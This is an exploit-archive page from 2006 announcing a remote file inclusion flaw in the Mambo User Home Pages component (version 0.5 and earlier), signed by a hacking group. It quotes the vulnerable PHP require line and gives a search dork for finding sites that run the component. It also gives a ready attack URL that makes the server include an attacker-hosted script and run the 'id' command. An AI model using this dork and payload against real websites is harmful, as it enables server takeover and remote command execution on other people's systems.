[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mambo User Home Pages Component <= 0.5 Remote Include Vulnerability
# Published : 2006-07-30
# Author : Kurdish Security
# Previous Title : ATutor <= 1.5.3.1 (links) Remote Blind SQL Injection Exploit
# Next Title : Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability


>>> Kurdish Security

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote

>>> Script : User Home Pges

>>> Site : www.ravensportal.co.uk

>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends

Code :

global $mosConfig_absolute_path;
require($mosConfig_absolute_path."/administrator/components/com_uhp/uhp_config.inc");

d0rkiz : allinurl:"com_uhp"

http://www.w0rkzsite.com/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=y0urscripts.txt?&cmd=id

And used link :]

footer.php
functions.php
install.uhp.php
toolbar.uhp.html.php
uhp.class.php
uhp_config.php
uninstall.uhp.php

# www.Syue.com [2006-07-30]